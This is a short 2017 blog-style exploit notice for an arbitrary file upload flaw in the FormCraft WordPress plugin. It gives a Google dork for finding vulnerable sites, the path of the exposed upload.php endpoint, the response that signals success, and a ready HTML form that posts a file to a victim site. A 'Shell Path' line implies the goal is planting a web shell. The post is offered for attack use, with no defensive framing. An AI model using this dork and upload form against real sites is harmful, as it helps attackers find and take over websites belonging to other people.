Monday, February 6, 2017

WordPress Plugins FromCraft File Upload

WordPress Plugins FromCraft File Upload




#- Title: WordPress Plugins FromCraft File Upload 
#- Author: -
#- Date: -
#- Developer : AndonDesign
#- Link Download : wordpress .org/plugins/formcraft-form-builder
#- Google Dork: inurl:"/plugins/formcraft/"
#- Fixed in Version : -
#- Tested on : win
=======================================================

-- Proof Of Concept --



Vulnerable : /wp-content/plugins/formcraft/file-upload/server/php/upload.php

When Vuln : {"files":

CSRF :
<form method=”POST” action=”http://victim. com/wp-content/plugins/formcraft/file-upload/server/php/upload.php”enctype=”multipart/form-data”><input type=”file” name=”files[]” /><button>Upload</button></form>


Shell Path : Here

Available link for download

Posted by at
Labels: , , , ,